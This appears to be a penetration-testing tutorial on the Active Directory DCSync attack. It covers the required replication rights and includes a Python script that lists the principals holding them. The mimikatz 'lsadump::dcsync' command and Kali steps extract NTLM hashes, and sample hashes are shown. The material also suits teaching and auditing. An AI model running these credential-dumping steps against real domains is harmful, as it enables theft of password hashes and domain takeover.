Domain Controllers Synchronization Attack


This attack requires that you have already compromised a high-privilege user holding the replication rights described under Theory (by default a member of Domain Admins, Enterprise Admins, or Administrators).

Theory

In production environments, domains typically rely on more than one domain controller to provide redundancy. The Directory Replication Service (DRS) Remote Protocol [1] uses replication [2] to keep these redundant domain controllers synchronized. A domain controller may request the current state of a specific object, such as an account, using the IDL_DRSGetNCChanges [3] API.

The DC receiving the request does not verify that it comes from a known domain controller; it only checks that the caller holds the replication extended rights on the naming context being replicated.

The goal of this attack is to send a rogue replication request from a machine that is not a DC and obtain the password hashes of any account in the domain, including krbtgt.

To do this, our user must hold the following extended rights on the domain object: Replicating Directory Changes (DS-Replication-Get-Changes), Replicating Directory Changes All (DS-Replication-Get-Changes-All), and Replicating Directory Changes in Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set). In practice the first two are what a DCSync of password hashes requires; the filtered-set right only matters for attributes in the RODC filtered attribute set.

Members of the Domain Admins, Enterprise Admins, or Administrators group at the domain level hold these rights by default, as do the domain controller computer accounts themselves. Any other principal that has been granted them on the domain object (a common misconfiguration, for example on service accounts used by identity-sync products) can DCSync just the same.
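Before attempting DCSync (or when auditing a domain for principals that could), it helps to read the domain object's DACL and list who actually holds the replication rights. The following is an added example, not code from the original page: it parses the SDDL form of the domain root's security descriptor (as returned by `(Get-Acl "AD:\DC=corp,DC=com").Sddl` on a domain-joined host) and reports every SID or alias that ends up with at least the Get-Changes and Get-Changes-All rights. The GUIDs are the real schema values for the three extended rights; `SAMPLE_SDDL`, the RIDs in it, and the function names are constructed for illustration.

```python
"""List principals holding the DCSync replication rights on a domain object.

Added example (not part of the original page). Input is an SDDL string such as
(Get-Acl "AD:\\DC=corp,DC=com").Sddl; SAMPLE_SDDL below is constructed.
"""
import re

# Well-known extended-right GUIDs from the AD schema (not invented here).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"

RIGHT_NAMES = {
    DS_REPLICATION_GET_CHANGES: "Replicating Directory Changes",
    DS_REPLICATION_GET_CHANGES_ALL: "Replicating Directory Changes All",
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET: "Replicating Directory Changes in Filtered Set",
}
# What a DCSync of password hashes actually needs.
DCSYNC_MINIMUM = {"Replicating Directory Changes", "Replicating Directory Changes All"}

# SDDL aliases for the groups named on the page; anything else is shown as a raw SID.
SID_ALIASES = {"DA": "Domain Admins", "EA": "Enterprise Admins", "BA": "Administrators"}

ACE_RE = re.compile(r"\(([^)]*)\)")
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
GENERIC_ALL = 0x10000000


def parse_aces(sddl):
    """Yield (ace_type, rights, object_guid, sid) for each ACE in the DACL part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]          # drop the SACL if one follows
    for m in ACE_RE.finditer(dacl):
        fields = m.group(1).split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inherit_guid, sid = fields[:6]
        yield ace_type, rights, obj_guid.lower(), sid


def grants_control_access(rights):
    """True if the rights field carries CR (control access / extended rights) or GA (generic all)."""
    if rights.startswith("0x"):
        mask = int(rights, 16)
        return bool(mask & (ADS_RIGHT_DS_CONTROL_ACCESS | GENERIC_ALL))
    # SDDL rights are two-letter codes; parse in pairs so "LC"+"RP" is not misread as "CR".
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & {"CR", "GA"})


def rights_conferred(rights, obj_guid):
    """Map one ACE to the set of replication right names it covers."""
    if not grants_control_access(rights):
        return set()
    if obj_guid == "":                      # no object GUID: every extended right
        return set(RIGHT_NAMES.values())
    return {RIGHT_NAMES[obj_guid]} if obj_guid in RIGHT_NAMES else set()


def dcsync_principals(sddl):
    """Return {principal: rights} for every SID/alias that can DCSync.

    Allow ACEs accumulate rights, deny ACEs remove them; a principal qualifies when it
    ends up with at least DCSYNC_MINIMUM. Group membership is not expanded, so a user
    who inherits the right through a group shows up only as that group.
    """
    allowed, denied = {}, {}
    for ace_type, rights, obj_guid, sid in parse_aces(sddl):
        bucket = {"A": allowed, "OA": allowed, "D": denied, "OD": denied}.get(ace_type)
        if bucket is None:
            continue
        bucket.setdefault(sid, set()).update(rights_conferred(rights, obj_guid))
    result = {}
    for sid, names in allowed.items():
        effective = names - denied.get(sid, set())
        if DCSYNC_MINIMUM <= effective:
            result[SID_ALIASES.get(sid, sid)] = effective
    return result


# Constructed sample, trimmed to the ACEs that matter: two admin groups with full control,
# RID 1105 explicitly granted all three rights, RID 1108 granted only Get-Changes.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;GA;;;DA)"
    "(A;;GA;;;EA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1108)"
    "(A;;RPLCLORC;;;AU)"                     # Authenticated Users: read only
)

if __name__ == "__main__":
    for principal, rights in dcsync_principals(SAMPLE_SDDL).items():
        print(f"{principal}: {', '.join(sorted(rights))}")
```

On the sample, Domain Admins, Enterprise Admins and the RID-1105 principal are reported; RID 1108 is not, because Get-Changes alone is not enough to pull secrets. Resolve any raw SID with `Get-ADObject -Filter 'objectSid -eq "<sid>"'` (or `rpcclient`'s `lookupsids` from Kali) to see which account or group it is.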

Attack from domain-joined Windows

We launch mimikatz as the privileged user and run lsadump::dcsync, requesting the Administrator account as an example:

mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...

Now that we have the NTLM hash we can try to crack it offline, or use it as-is in a pass-the-hash attack.

Attack from Kali

We want the hash of the user dave, so we run the DCSync from Kali against the IP address of the domain controller, authenticating as our privileged user.

We get it: dave's NTLM hash is 08d7a47a6f9f66b97b1bae4178747494.
